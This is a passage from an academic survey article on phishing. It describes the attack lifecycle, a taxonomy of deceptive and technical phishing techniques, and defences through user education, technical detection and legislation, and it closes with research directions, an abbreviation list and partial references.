This phase involves using attack techniques to deliver the threat to the victim as well as the victim’s interaction with the attack in terms of responding or not. After the victim's response, the system may be compromised by the attacker to collect user's information using techniques such as injecting client-side script into webpages ( Johnson, 2016 ). Phishers can compromise hosts without any technical knowledge by purchasing access from hackers ( Abad, 2005 ). A threat is a possible danger that that might exploit a vulnerability to compromise people’s security and privacy or cause possible harm to a computer system for malicious purposes. Threats could be malware, botnet, eavesdropping, unsolicited emails, and viral links. Several Phishing techniques are discussed in sub- Types and Techniques of Phishing Attacks .

Valuables Acquisition Phase

In this stage, the phisher collects information or valuables from victims and uses it illegally for purchasing, funding money without the user’s knowledge, or selling these credentials in the black market. Attackers target a wide range of valuables from their victims that range from money to people’s lives. For example, attacks on online medical systems may lead to loss of life. Victim’s data can be collected by phishers manually or through automated techniques ( Jakobsson et al., 2007 ).

The data collection can be conducted either during or after the victim’s interaction with the attacker. However, to collect data manually simple techniques are used wherein victims interact directly with the phisher depending on relationships within social networks or other human deception techniques ( Ollmann, 2004 ). Whereas in automated data collection, several techniques can be used such as fake web forms that are used in web spoofing ( Dhamija et al., 2006 ). Additionally, the victim’s public data such as the user’s profile in social networks can be used to collect the victim’s background information that is required to initialize social engineering attacks ( Wenyin et al., 2005 ). In VoIP attacks or phone attack techniques such as recorded messages are used to harvest user's data ( Huber et al., 2009 ).

Types and Techniques of Phishing Attacks

Phishers conduct their attack either by using psychological manipulation of individuals into disclosing personal information (i.e., deceptive attack as a form of social engineering) or using technical methods. Phishers, however, usually prefer deceptive attacks by exploiting human psychology rather than technical methods. Figure 9 illustrates the types of phishing and techniques used by phishers to conduct a phishing attack. Each type and technique is explained in subsequent sections and subsections.

FIGURE 9 . Phishing attack types and techniques drawing upon existing phishing attacks.

Deceptive Phishing

Deceptive phishing is the most common type of phishing attack in which the attacker uses social engineering techniques to deceive victims. In this type of phishing, a phisher uses either social engineering tricks by making up scenarios (i.e., false account update, security upgrade), or technical methods (i.e., using legitimate trademarks, images, and logos) to lure the victim and convince them of the legitimacy of the forged email ( Jakobsson and Myers, 2006 ). By believing these scenarios, the user will fall prey and follow the given link, which leads to disclose his personal information to the phisher.

Deceptive phishing is performed through phishing emails; fake websites; phone phishing (Scam Call and IM); social media; and via many other mediums. The most common social phishing types are discussed below;

Phishing e-Mail

The most common threat derived by an attacker is deceiving people via email communications and this remains the most popular phishing type to date. A Phishing email or Spoofed email is a forged email sent from an untrusted source to thousands of victims randomly. These fake emails are claiming to be from a person or financial institution that the recipient trusts in order to convince recipients to take actions that lead them to disclose their sensitive information. A more organized phishing email that targets a particular group or individuals within the same organization is called spear phishing. In the above type, the attacker may gather information related to the victim such as name and address so that it appears to be credible emails from a trusted source ( Wang et al., 2008 ), and this is linked to the planning phase of the phishing anatomy proposed in this article. A more sophisticated form of spear phishing is called whaling, which targets high-rank people such as CEOs and CFOs. Some examples of spear-phishing attack victims in early 2016 are the phishing email that hacked the Clinton campaign chairman John Podesta’s Gmail account ( Parmar, 2012 ). Clone phishing is another type of email phishing, where the attacker clones a legitimate and previously delivered email by spoofing the email address and using information related to the recipient such as addresses from the legitimate email with replaced links or malicious attachments ( Krawchenko, 2016 ). The basic scenario for this attack is illustrated previously in Figure 4 and can be described in the following steps.

1. The phisher sets up a fraudulent email containing a link or an attachment (planning phase).

2. The phisher executes the attack by sending a phishing email to the potential victim using an appropriate medium (attack conducting phase).

3. The link (if clicked) directs the user to a fraudulent website, or to download malware in case of clicking the attachment (interaction phase).

4. The malicious website prompts users to provide confidential information or credentials, which are then collected by the attacker and used for fraudulent activities. (Valuables acquisition phase).

Often, the phisher does not use the credentials directly; instead, they resell the obtained credentials or information on a secondary market ( Jakobsson and Myers, 2006 ), for instance, script kiddies might sell the credentials on the dark web.

Spoofed Website

This is also called phishing websites, in which phishers forge a website that appears to be genuine and looks similar to the legitimate website. An unsuspicious user is redirected to this website after clicking a link embedded within an email or through an advertisement (clickjacking) or any other way. If the user continues to interact with the spoofed website, sensitive information will be disclosed and harvested by the phisher ( CSIOnsite, 2012 ).

Phone Phishing (Vishing and SMishing)

This type of phishing is conducted through phone calls or text messages, in which the attacker pretends to be someone the victim knows or any other trusted source the victim deals with. A user may receive a convincing security alert message from a bank convincing the victim to contact a given phone number with the aim to get the victim to share passwords or PIN numbers or any other Personally Identifiable Information (PII). The victim may be duped into clicking on an embedded link in the text message. The phisher then could take the credentials entered by the victim and use them to log in to the victims' instant messaging service to phish other people from the victim’s contact list. A phisher could also make use of Caller IDentification (CID) 3 spoofing to dupe the victim that the call is from a trusted source or by leveraging from an internet protocol private branch exchange (IP PBX) 4 tools which are open-source and software-based that support VoIP ( Aburrous et al., 2008 ). A new report from Fraud Watch International about phishing attack trends for 2019 anticipated an increase in SMishing where the text messages content is only viewable on a mobile device ( FraudWatchInternational, 2019 ).

Social Media Attack (Soshing, Social Media Phishing)

Social media is the new favorite medium for cybercriminals to conduct their phishing attacks. The threats of social media can be account hijacking, impersonation attacks, scams, and malware distributing. However, detecting and mitigating these threats requires a longer time than detecting traditional methods as social media exists outside of the network perimeter. For example, the nation-state threat actors conducted an extensive series of social media attacks on Microsoft in 2014. Multiple Twitter accounts were affected by these attacks and passwords and emails for dozens of Microsoft employees were revealed ( Ramzan, 2010 ). According to Kaspersky Lab’s, the number of phishing attempts to visit fraudulent social network pages in the first quarter of 2018 was more than 3.7 million attempts, of which 60% were fake Facebook pages ( Raggo, 2016 ).

The new report from predictive email defense company Vade Secure about phishers’ favorites for quarter 1 and quarter 2 of 2019, stated that Soshing primarily on Facebook and Instagram saw a 74.7% increase that is the highest quarter-over- quarter growth of any industry ( VadeSecure, 2021 ).

Technical Subterfuge

Technical subterfuge is the act of tricking individuals into disclosing their sensitive information through technical subterfuge by downloading malicious code into the victim's system. Technical subterfuge can be classified into the following types:

Malware-Based Phishing

As the name suggests, this is a type of phishing attack which is conducted by running malicious software on a user’s machine. The malware is downloaded to the victim’s machine, either by one of the social engineering tricks or technically by exploiting vulnerabilities in the security system (e.g., browser vulnerabilities) ( Jakobsson and Myers, 2006 ). Panda malware is one of the successful malware programs discovered by Fox-IT Company in 2016. This malware targets Windows Operating Systems (OS). It spreads through phishing campaigns and its main attack vectors include web injects, screenshots of user activity (up to 100 per mouse click), logging of keyboard input, Clipboard pastes (to grab passwords and paste them into form fields), and exploits to the Virtual Network Computing (VNC) desktop sharing system. In 2018, Panda malware expanded its targets to include cryptocurrency exchanges and social media sites ( F5Networks, 2018 ). There are many forms of Malware-based phishing attacks; some of them are discussed below:

Key Loggers and Screen Loggers

Loggers are the type of malware used by phishers and installed either through Trojan horse email attachments or through direct download to the user’s personal computer. This software monitors data and records user keystrokes and then sends it to the phisher. Phisher uses the key loggers to capture sensitive information related to victims, such as names, addresses, passwords, and other confidential data. Key loggers can also be used for non-phishing purposes such as to monitor a child's use of the internet. Key loggers can also be implemented in many other ways such as detecting URL changes and logs information as Browser Helper Object (BHO) that enables the attacker to take control of the features of all IE’s, monitoring keyboard and mouse input as a device driver and, monitoring users input and displays as a screen logger ( Jakobsson and Myers, 2006 ).

Viruses and Worms

A virus is a type of malware, which is a piece of code spreading in another application or program by making copies of itself in a self-automated manner ( Jakobsson and Myers, 2006 ; F5Networks, 2018 ). Worms are similar to viruses but they differ in the execution manner, as worms are executed by exploiting the operating systems vulnerability without the need to modify another program. Viruses transfer from one computer to another with the document that they are attached to, while worms transfer through the infected host file. Both viruses and worms can cause data and software damaging or Denial-of-Service (DoS) conditions ( F5Networks, 2018 ).

Spying software is a malicious code designed to track the websites visited by users in order to steal sensitive information and conduct a phishing attack. Spyware can be delivered through an email and, once it is installed on the computer, take control over the device and either change its settings or gather information such as passwords and credit card numbers or banking records which can be used for identity theft ( Jakobsson and Myers, 2006 ).

Adware is also known as advertising-supported software ( Jakobsson and Myers, 2006 ). Adware is a type of malware that shows the user an endless pop-up window with ads that could harm the performance of the device. Adware can be annoying but most of it is safe. Some of the adware could be used for malicious purposes such as tracking the internet sites the user visits or even recording the user's keystrokes ( cisco, 2018 ).

Ransomware is a type of malware that encrypts the user's data after they run an executable program on the device. In this type of attack, the decryption key is held until the user pays a ransom (cisco, 2018). Ransomware is responsible for tens of millions of dollars in extortion annually. Worse still, this is hard to detect with developing new variants, facilitating the evasion of many antivirus and intrusion detection systems ( Latto, 2020 ). Ransomware is usually delivered to the victim's device through phishing emails. According to a report ( PhishMe, 2016 ), 93% of all phishing emails contained encryption ransomware. Phishing, as a social engineering attack, convinces victims into executing actions without knowing about the malicious program.

A rootkit is a collection of programs, typically malicious, that enables access to a computer or computer network. These toolsets are used by intruders to hide their actions from system administrators by modifying the code of system calls and changing the functionality ( Belcic, 2020 ). The term “rootkit” has negative connotations through its association with malware, and it is used by the attacker to alert existing system tools to escape detection. These kits enable individuals with little or no knowledge to launch phishing exploits. It contains coding, mass emailing software (possibly with thousands of email addresses included), web development software, and graphic design tools. An example of rootkits is the Kernel kit. Kernel-Level Rootkits are created by replacing portions of the core operating system or adding new code via Loadable Kernel Modules in (Linux) or device drivers (in Windows) ( Jakobsson and Myers, 2006 ).

Session Hijackers

In this type, the attacker monitors the user’s activities by embedding malicious software within a browser component or via network sniffing. The monitoring aims to hijack the session, so that the attacker performs an unauthorized action with the hijacked session such as financial transferring, without the user's permission ( Jakobsson and Myers, 2006 ).

Web Trojans

Web Trojans are malicious programs that collect user’s credentials by popping up in a hidden way over the login screen ( Jakobsson and Myers, 2006 ). When the user enters the credentials, these programs capture and transmit the stolen credentials directly to the attacker ( Jakobsson et al., 2007 ).

Hosts File Poisoning

This is a way to trick a user into going to the phisher’s site by poisoning (changing) the host’s file. When the user types a particular website address in the URL bar, the web address will be translated into a numeric (IP) address before visiting the site. The attacker, to take the user to a fake website for phishing purposes, will modify this file (e.g., DNS cache). This type of phishing is hard to detect even by smart and perceptive users ( Ollmann, 2004 ).

System Reconfiguration Attack

In this format of the phishing attack, the phisher manipulates the settings on a user’s computer for malicious activities so that the information on this PC will be compromised. System reconfigurations can be changed using different methods such as reconfiguring the operating system and modifying the user’s Domain Name System (DNS) server address. The wireless evil twin is an example of a system reconfiguration attack in which all user’s traffic is monitored via a malicious wireless Access Point (AP) ( Jakobsson and Myers, 2006 ).

Data theft is an unauthorized accessing and stealing of confidential information for a business or individuals. Data theft can be performed by a phishing email that leads to the download of a malicious code to the user's computer which in turn steals confidential information stored in that computer directly ( Jakobsson and Myers, 2006 ). Stolen information such as passwords, social security numbers, credit card information, sensitive emails, and other personal data could be used directly by a phisher or indirectly by selling it for different purposes.

Domain Name System Based Phishing (Pharming)

Any form of phishing that interferes with the domain name system so that the user will be redirected to the malicious website by polluting the user's DNS cache with wrong information is called DNS-based phishing. Although the host’s file is not a part of the DNS, the host’s file poisoning is another form of DNS based phishing. On the other hand, by compromising the DNS server, the genuine IP addresses will be modified which results in taking the user unwillingly to a fake location. The user can fall prey to pharming even when clicking on a legitimate link because the website’s domain name system (DNS) could be hijacked by cybercriminals ( Jakobsson and Myers, 2006 ).

Content Injection Phishing

Content-Injection Phishing refers to inserting false content into a legitimate site. This malicious content could misdirect the user into fake websites, leading users into disclosing their sensitive information to the hacker or it can lead to downloading malware into the user's device ( Jakobsson and Myers, 2006 ). The malicious content could be injected into a legitimate site in three primary ways:

1. Hacker exploits a security vulnerability and compromises a web server.

2. Hacker exploits a Cross-Site Scripting (XSS) vulnerability that is a programming flaw that enables attackers to insert client-side scripts into web pages, which will be viewed by the visitors to the targeted site.

3. Hacker exploits Structured Query Language (SQL) injection vulnerability, which allows hackers to steal information from the website’s database by executing database commands on a remote server.

Man-In-The-Middle Phishing

The Man In The Middle attack (MITM) is a form of phishing, in which the phishers insert communications between two parties (i.e. the user and the legitimate website) and tries to obtain the information from both parties by intercepting the victim’s communications ( Ollmann, 2004 ). Such that the message is going to the attacker instead of going directly to the legitimate recipients. For a MITM, the attacker records the information and misuse it later. The MITM attack conducts by redirecting the user to a malicious server through several techniques such as Address Resolution Protocol (ARP) poisoning, DNS spoofing, Trojan key loggers, and URL Obfuscation ( Jakobsson and Myers, 2006 ).

Search Engine Phishing

In this phishing technique, the phisher creates malicious websites with attractive offers and use Search Engine Optimization (SEO) tactics to have them indexed legitimately such that it appears to the user when searching for products or services. This is also known as black hat SEO ( Jakobsson and Myers, 2006 ).

URL and HTML Obfuscation Attacks

In most of the phishing attacks, phishers aim to convince a user to click on a given link that connects the victim to a malicious phishing server instead of the destination server. This is the most popular technique used by today's phishers. This type of attack is performed by obfuscating the real link (URL) that the user intends to connect (an attempt from the attacker to make their web address look like the legitimate one). Bad Domain Names and Host Name Obfuscation are common methods used by attackers to fake an address ( Ollmann, 2004 ).

Countermeasures

A range of solutions are being discussed and proposed by the researchers to overcome the problems of phishing, but still, there is no single solution that can be trusted or capable of mitigating these attacks ( Hong, 2012 ; Boddy, 2018 ; Chanti and Chithralekha, 2020 ). The proposed phishing countermeasures in the literature can be categorized into three major defense strategies. The first line of defense is human-based solutions by educating end-users to recognize phishing and avoid taking the bait. The second line of defense is technical solutions that involve preventing the attack at early stages such as at the vulnerability level to prevent the threat from materializing at the user's device, which means decreasing the human exposure, and detecting the attack once it is launched through the network level or at the end-user device. This also includes applying specific techniques to track down the source of the attack (for example these could include identification of new domains registered that are closely matched with well-known domain names). The third line of defense is the use of law enforcement as a deterrent control. These approaches can be combined to create much stronger anti-phishing solutions. The above solutions are discussed in detail below.

Human Education (Improving User Awareness About Phishing)

Human education is by far an effective countermeasure to avoid and prevent phishing attacks. Awareness and human training are the first defense approach in the proposed methodology for fighting against phishing even though it does not assume complete protection ( Hong, 2012 ). End-user education reduces user's susceptibility to phishing attacks and compliments other technical solutions. According to the analysis carried out in ( Bailey et al., 2008 ), 95% of phishing attacks are caused due to human errors; nonetheless, existing phishing detection training is not enough for combating current sophisticated attacks. In the study presented by Khonji et al. (2013) , security experts contradict the effectiveness and usability of user education. Furthermore, some security experts claim that user education is not effective as security is not the main goal for users and users do not have a motivation to educate themselves about phishing ( Scaife et al., 2016 ), while others confirm that user education could be effective if designed properly ( Evers, 2006 ; Whitman and Mattord, 2012 ). Moreover, user training has been mentioned by many researchers as an effective way to protect users when they are using online services ( Dodge et al., 2007 ; Salem et al., 2010 ; Chanti and Chithralekha, 2020 ). To detect and avoid phishing emails, a combined training approach was proposed by authors in the study ( Salem et al., 2010 ). The proposed solution uses a combination of tools and human learning, wherein a security awareness program is introduced to the user as a first step. The second step is using an intelligent system that detects the attacks at the email level. After that, the emails are classified by a fuzzy logic-based expert system. The main critic of this method is that the study chooses only limited characteristics of the emails as distinguishing features ( Kumaraguru et al., 2010 ; CybintCyberSolutions, 2018 ). Moreover, the majority of phishing training programs focus on how to recognize and avoid phishing emails and websites while other threatening phishing types receive less attention such as voice phishing and malware or adware phishing. The authors in ( Salem et al., 2010 ) found that the most used solutions in educating people are not useful if they ignore the notifications/warnings about fake websites. Training users should involve three major directions: the first one is awareness training through holding seminars or online courses for both employees within organizations or individuals. The second one is using mock phishing attacks to attack people to test users’ vulnerability and allow them to assess their own knowledge about phishing. However, only 38% of global organizations claim they are prepared to handle a sophisticated cyber-attack ( Kumaraguru et al., 2010 ). Wombat Security’s State of the Phish™ Report 2018 showed that approximately two-fifths of American companies use computer-based online awareness training and simulated phishing attacks as educating tools on a monthly basis, while just 15% of United Kingdom firms do so ( CybintCyberSolutions, 2018 ). The third direction is educating people by developing games to teach people about phishing. The game developer should take into consideration different aspects before designing the game such as audience age and gender, because people's susceptibility to phishing is varying. Authors in the study ( Sheng et al., 2007 ) developed a game to train users so that they can identify phishing attacks called Anti-Phishing Phil that teaches about phishing web pages, and then tests users about the efficiency and effectiveness of the game. The results from the study showed that the game participants improve their ability to identify phishing by 61% indicating that interactive games might turn out to be a joyful way of educating people. Although, user’s education and training can be very effective to mitigate security threats, phishing is becoming more complex and cybercriminals can fool even the security experts by creating convincing spear phishing emails via social media. Therefore, individual users and employees must have at least basic knowledge about dealing with suspicious emails and report it to IT staff and specific authorities. In addition, phishers change their strategies continuously, which makes it harder for organizations, especially small/medium enterprises to afford the cost of their employee education. With millions of people logging on to their social media accounts every day, social media phishing is phishers' favorite medium to deceive their victims. For example, phishers are taking advantage of the pervasiveness of Facebook to set up creative phishing attacks utilizing the Facebook Login feature that enables the phisher to compromise all the user's accounts with the same credentials (VadeSecure). Some countermeasures are taken by Social networks to reduce suspicious activities on social media such as Two-Factor authentication for logging in, that is required by Facebook, and machine-learning techniques used by Snapchat to detect and prevent suspicious links sent within the app ( Corrata, 2018 ). However, countermeasures to control Soshing and phone phishing attacks might include:

• Install anti-virus, anti-spam software as a first action and keep it up to date to detect and prevent any unauthorized access.

• Educate yourself about recent information on phishing, the latest trends, and countermeasures.

• Never click on hyperlinks attached to a suspicious email, post, tweet, direct message.

• Never trust social media, do not give any sensitive information over the phone or non-trusted account. Do not accept friend requests from people you do not know.

• Use a unique password for each account.

Training and educating users is an effective anti-phishing countermeasure and has already shown promising initial results. The main downside of this solution is that it demands high costs ( Dodge et al., 2007 ). Moreover, this solution requires basic knowledge in computer security among trained users.

Technical Solutions

The proposed technical solutions for detecting and blocking phishing attacks can be divided into two major approaches: non-content based solutions and content-based solutions ( Le et al., 2006 ; Bin et al., 2010 ; Boddy, 2018 ). Both approaches are briefly described in this section. Non-content based methods include blacklists and whitelists that classify the fake emails or webpages based on the information that is not part of the email or the webpage such as URL and domain name features ( Dodge et al., 2007 ; Ma et al., 2009 ; Bin et al., 2010 ; Salem et al., 2010 ). Stopping the phishing sites using blacklist and whitelist approaches, wherein a list of known URLs and sites is maintained, the website under scrutiny is checked against such a list in order to be classified as a phishing or legitimate site. The downside of this approach is that it will not identify all phishing websites. Because once a phishing site is taken down, the phisher can easily register a new domain ( Miyamoto et al., 2009 ). Content-based methods classify the page or the email relying on the information within its content such as texts, images, and also HTML, java scripts, and Cascading Style Sheets (CSS) codes ( Zhang et al., 2007 ; Maurer and Herzner, 2012 ). Content-based solutions involve Machine Learning (ML), heuristics, visual similarity, and image processing methods ( Miyamoto et al., 2009 ; Chanti and Chithralekha, 2020 ). and finally, multifaceted methods, which apply a combination of the previous approaches to detect and prevent phishing attacks ( Afroz and Greenstadt, 2009 ). For email filtering, ML techniques are commonly used for example in 2007, the first email phishing filter was developed by authors in ( Fette et al., 2007 ). This technique uses a set of features such as URLs that use different domain names. Spam filtering techniques ( Cormack et al., 2011 ) and statistical classifiers ( Bergholz et al., 2010 ) are also used to identify a phishing email. Authentication and verification technologies are also used in spam email filtering as an alternative to heuristics methods. For example, the Sender Policy Framework (SPF) verifies whether a sender is valid when accepting mail from a remote mail server or email client ( Deshmukh and raddha Popat, 2017 ).

The technical solutions for Anti-phishing are available at different levels of the delivery chain such as mail servers and clients, Internet Service Providers (ISPs), and web browser tools. Drawing from the proposed anatomy for phishing attacks in Proposed Phishing Anatomy , authors categorize technical solutions into the following approaches:

1. Techniques to detect the attack after it has been launched. Such as by scanning the web to find fake websites. For example, content-based phishing detection approaches are heavily deployed on the Internet. The features from the website elements such as Image, URL, and text content are analyzed using Rule-based approaches and Machine Learning that examine the presence of special characters (@), IP addresses instead of the domain name, prefix/suffix, HTTPS in domain part and other features ( Jeeva and Rajsingh, 2016 ). Fuzzy Logic (FL) has also been used as an anti-phishing model to help classify websites into legitimate or ‘phishy’ as this model deals with intervals rather than specific numeric values ( Aburrous et al., 2008 ).

2. Techniques to prevent the attack from reaching the user's system. Phishing prevention is an important step to defend against phishing by blocking a user from seeing and dealing with the attack. In email phishing, anti-spam software tools can block suspicious emails. Phishers usually send a genuine look-alike email that dupes the user to open an attachment or click on a link. Some of these emails pass the spam filter because phishers use misspelled words. Therefore, techniques that detect fake emails by checking the spelling and grammar correction are increasingly used, so that it can prevent the email from reaching the user's mailbox. Authors in the study ( Fette et al., 2007 ) have developed a new classification algorithm based on the Random Forest algorithm after exploring email phishing utilizing the C4.5 decision tree generator algorithm. The developed method is called "Phishing Identification by Learning on Features of Email Received" (PILFER), which can classify phishing email depending on various features such as IP based URLs, the number of links in the HTML part(s) of an email, the number of domains, the number of dots, nonmatching URLs, and availability of JavaScripts. The developed method showed high accuracy in detecting phishing emails ( Afroz and Greenstadt, 2009 ).

3. Corrective techniques that can take down the compromised website, by requesting the website's Internet Service Provider (ISP) to shut down the fake website in order to prevent more users from falling victims to phishing ( Moore and Clayton, 2007 ; Chanti and Chithralekha, 2020 ). ISPs are responsible for taking down fake websites. Removing the compromised and illegal websites is a complex process; many entities are involved in this process from private companies, self-regulatory bodies, government agencies, volunteer organizations, law enforcement, and service providers. Usually, illegal websites are taken down by Takedown Orders, which are issued by courts or in some jurisdictions by law enforcement. On the other hand, these can be voluntarily taken down by the providers themselves as a result of issued takedown notices ( Moore and Clayton, 2007 ; Hutchings et al., 2016 ). According to PHISHLABS ( PhishLabs, 2019 ) report, taking down phishing sites is helpful but it is not completely effective as these sites can still be alive for days stealing customers' credentials before detecting the attack.

4. Warning tools or security indicators that embedded into the web browser to inform the user after detecting the attack. For example, eBay Toolbar and Account Guard ( eBay Toolbar and Account Guard, 2009 ) protect customer’s eBay and PayPal passwords respectively by alerting the users about the authenticity of the sites that users try to type the password in. Numerous anti-phishing solutions rely mainly on warnings that are displayed on the security toolbar. In addition, some toolbars block suspicious sites to warn about it such as McAfee and Netscape. A study presented in ( Robichaux and Ganger, 2006 ) conducted a test to evaluate the performance of eight anti-phishing solutions, including Microsoft Internet Explorer 7, EarthLink, eBay, McAfee, GeoTrust, Google using Firefox, Netscape, and Netcraft. These tools are warning and blocking tools that allow legitimate sites while block and warn about known phishing sites. The study also found that Internet Explorer and Netcraft Toolbar showed the most effective results than other anti-phishing tools. However, security toolbars are still failing to avoid people falling victim to phishing despite these toolbars improving internet security in general ( Abu-Nimeh and Nair, 2008 ).

5. Authentication ( Moore and Clayton, 2007 ) and authorization ( Hutchings et al., 2016 ) techniques that provide protection from phishing by verifying the identity of the legitimate person. This prevents phishers from accessing a protected resource and conducting their attack. There are three types of authentication; single-factor authentication requires only username and password. The second type is two-factor authentication that requires additional information in addition to the username and password such as an OTP (One-Time Password) which is sent to the user’s email id or phone. The third type is multi-factor authentication using more than one form of identity (i.e., a combination of something you know, something you are, and something you have). Some widely used methods in the authorization process are API authorization and OAuth 2.0 that allow the previously generated API to access the system.

However, the progressive increase in phishing attacks shows that previous methods do not provide the required protection against most existing phishing attacks. Because no single solution or technology could prevent all phishing attacks. An effective anti-phishing solution should be based on a combination of technical solutions and increased user awareness ( Boddy, 2018 ).

Solutions Provided by Legislations as a Deterrent Control

A cyber-attack is considered a crime when an individual intentionally accesses personal information on a computer without permission, even if the individual does not steal information or damage the system ( Mince-Didier, 2020 ). Since the sole objective of almost all phishing attacks is to obtain sensitive information by knowingly intending to commit identity theft, and while there are currently no federal laws in the United States aimed specifically at phishing, therefore, phishing crimes are usually covered under identity theft laws. Phishing is considered a crime even if the victim does not actually fall for the phishing scam, the punishments depend on circumstances and usually include jail, fines, restitution, probation ( Nathan, 2020 ). Phishing attacks are causing different levels of damages to the victims such as financial and reputational losses. Therefore, law enforcement authorities should track down these attacks in order to punish the criminal as with real-world crimes. As a complement to technical solutions and human education, the support provided by applicable laws and regulations can play a vital role as a deterrent control. Increasingly authorities around the world have created several regulations in order to mitigate the increase of phishing attacks and their impact. The first anti-phishing laws were enacted by the United States, where the FTC in the US added the phishing attacks to the computer crime list in January 2004. A year later, the ‘‘Anti-Phishing Act’’ was introduced in the US Congress in March 2005 ( Mohammad et al., 2014 ). Meanwhile, in the United Kingdom, the law legislation is gradually conforming to address phishing and other forms of cyber-crime. In 2006, the United Kingdom government improved the Computer Misuse Act 1990 intending to bring it up to date with developments in computer crime and to increase penalties for breach enacted penalties of up to 10 years ( eBay Toolbar and Account Guard, 2009 ; PhishLabs, 2019 ). In this regard, a student in the United Kingdom who made hundreds of thousands of pounds blackmailing pornography website users was jailed in April 2019 for six years and five months. According to the National Crime Agency (NCA), this attacker was the most prolific cybercriminal to be sentenced in the United Kingdom ( Casciani, 2019 ). Moreover, the organizations bear part of the responsibility in protecting personal information as stated in the Data Protection Act 2018 and EU General Data Protection Regulation (GDPR). Phishing websites also can be taken down through Law enforcement agencies' conduct. In the United Kingdom, websites can be taken down by the National Crime Agency (NCA), which includes the National Cyber Crime Unit, and by the City of London Police, which includes the Police Intellectual Property Crime Unit (PIPCU) and the National Fraud Intelligence Bureau (NFIB) ( Hutchings et al., 2016 ).

However, anti-phishing law enforcement is still facing numerous challenges and limitations. Firstly, after perpetrating the phishing attack, the phisher can vanish in cyberspace making it difficult to prove the guilt attributed to the offender and to recover the damages caused by the attack, limiting the effectiveness of the law enforcement role. Secondly, even if the attacker’s identity is disclosed in the case of international attackers, it will be difficult to bring this attacker to justice because of the differences in countries' legislations (e.g., exchange treaties). Also, the attack could be conducted within a short time span, for instance, the average lifetime for a phishing web site is about 54 h as stated by the APWG, therefore, there must be a quick response from the government and the authorities to detect, control and identify the perpetrators of the attack ( Ollmann, 2004 ).

Phishing attacks remain one of the major threats to individuals and organizations to date. As highlighted in the article, this is mainly driven by human involvement in the phishing cycle. Often phishers exploit human vulnerabilities in addition to favoring technological conditions (i.e., technical vulnerabilities). It has been identified that age, gender, internet addiction, user stress, and many other attributes affect the susceptibility to phishing between people. In addition to traditional phishing channels (e.g., email and web), new types of phishing mediums such as voice and SMS phishing are on the increase. Furthermore, the use of social media-based phishing has increased in use in parallel with the growth of social media. Concomitantly, phishing has developed beyond obtaining sensitive information and financial crimes to cyber terrorism, hacktivism, damaging reputations, espionage, and nation-state attacks. Research has been conducted to identify the motivations and techniques and countermeasures to these new crimes, however, there is no single solution for the phishing problem due to the heterogeneous nature of the attack vector. This article has investigated problems presented by phishing and proposed a new anatomy, which describes the complete life cycle of phishing attacks. This anatomy provides a wider outlook for phishing attacks and provides an accurate definition covering end-to-end exclusion and realization of the attack.

Although human education is the most effective defense for phishing, it is difficult to remove the threat completely due to the sophistication of the attacks and social engineering elements. Although, continual security awareness training is the key to avoid phishing attacks and to reduce its impact, developing efficient anti-phishing techniques that prevent users from being exposed to the attack is an essential step in mitigating these attacks. To this end, this article discussed the importance of developing anti-phishing techniques that detect/block the attack. Furthermore, the importance of techniques to determine the source of the attack could provide a stronger anti-phishing solution as discussed in this article.

Furthermore, this article identified the importance of law enforcement as a deterrent mechanism. Further investigations and research are necessary as discussed below.

1. Further research is necessary to study and investigate susceptibility to phishing among users, which would assist in designing stronger and self-learning anti-phishing security systems.

2. Research on social media-based phishing, Voice Phishing, and SMS Phishing is sparse and these emerging threats are predicted to be significantly increased over the next years.

3. Laws and legislations that apply for phishing are still at their infant stage, in fact, there are no specific phishing laws in many countries. Most of the phishing attacks are covered under traditional criminal laws such as identity theft and computer crimes. Therefore, drafting of specific laws for phishing is an important step in mitigating these attacks in a time where these crimes are becoming more common.

4. Determining the source of the attack before the end of the phishing lifecycle and enforcing law legislation on the offender could help in restricting phishing attacks drastically and would benefit from further research.

It can be observed that the mediums used for phishing attacks have changed from traditional emails to social media-based phishing. There is a clear lag between sophisticated phishing attacks and existing countermeasures. The emerging countermeasures should be multidimensional to tackle both human and technical elements of the attack. This article provides valuable information about current phishing attacks and countermeasures whilst the proposed anatomy provides a clear taxonomy to understand the complete life cycle of phishing.

Author Contributions

This work is by our PhD student ZA supported by her Supervisory Team.

Conflict of Interest

The authors declare that the research was conducted in the absence of any commercial or financial relationships that could be construed as a potential conflict of interest.

AOL America Online

APWG Anti Phishing Working Group Advanced

APRANET Advanced Research Projects Agency Network.

ARP address resolution protocol.

BHO Browser Helper Object

BEC business email compromise

COVID-19 Coronavirus disease 2019

CSS cascading style sheets

DDoS distributed denial of service

DNS Domain Name System

DoS Denial of Service

FTC Federal Trade Commission

FL Fuzzy Logic

HTTPS Hypertext Transfer Protocol Secure

IE Internet Explorer

ICT Information and Communications Technology

IM Instant Message

IT Information Technology

IP Internet Protocol

MITM Man-in-the-Middle

NCA National Crime Agency

NFIB National Fraud Intelligence Bureau

PIPCU Police Intellectual Property Crime Unit

OS Operating Systems

PBX Private Branch Exchange

SMishing Text Message Phishing

SPF Sender Policy Framework

SMTP Simple Mail Transfer Protocol

SMS Short Message Service

Soshing Social Media Phishing

SQL structured query language

URL Uniform Resource Locator

UK United Kingdom

US United States

USB Universal Serial Bus

US-CERT United States Computer Emergency Readiness Team.

Vishing Voice Phishing

VNC Virtual Network Computing

VoIP Voice over Internet Protocol

XSS Cross-Site Scripting

1 Proofpoint is “a leading cybersecurity company that protects organizations’ greatest assets and biggest risks: their people. With an integrated suite of cloud-based solutions”( Proofpoint, 2019b ).

2 APWG Is “the international coalition unifying the global response to cybercrime across industry, government and law-enforcement sectors and NGO communities” ( APWG, 2020 ).

3 CalleR ID is “a telephone facility that displays a caller’s phone number on the recipient's phone device before the call is answered” ( Techpedia, 2021 ).

4 An IPPBX is “a telephone switching system within an enterprise that switches calls between VoIP users on local lines while allowing all users to share a certain number of external phone lines” ( Margaret, 2008 ).

Abad, C. (2005). The economy of phishing: a survey of the operations of the phishing market. First Monday 10, 1–11. doi:10.5210/fm.v10i9.1272

CrossRef Full Text | Google Scholar

Abu-Nimeh, S., and Nair, S. (2008). “Bypassing security toolbars and phishing filters via dns poisoning,” in IEEE GLOBECOM 2008–2008 IEEE global telecommunications conference , New Orleans, LA , November 30–December 2, 2008 ( IEEE) , 1–6. doi:10.1109/GLOCOM.2008.ECP.386

Aburrous, M., Hossain, M. A., Thabatah, F., and Dahal, K. (2008). “Intelligent phishing website detection system using fuzzy techniques,” in 2008 3rd international conference on information and communication technologies: from theory to applications (New York, NY: IEEE , 1–6. doi:10.1109/ICTTA.2008.4530019

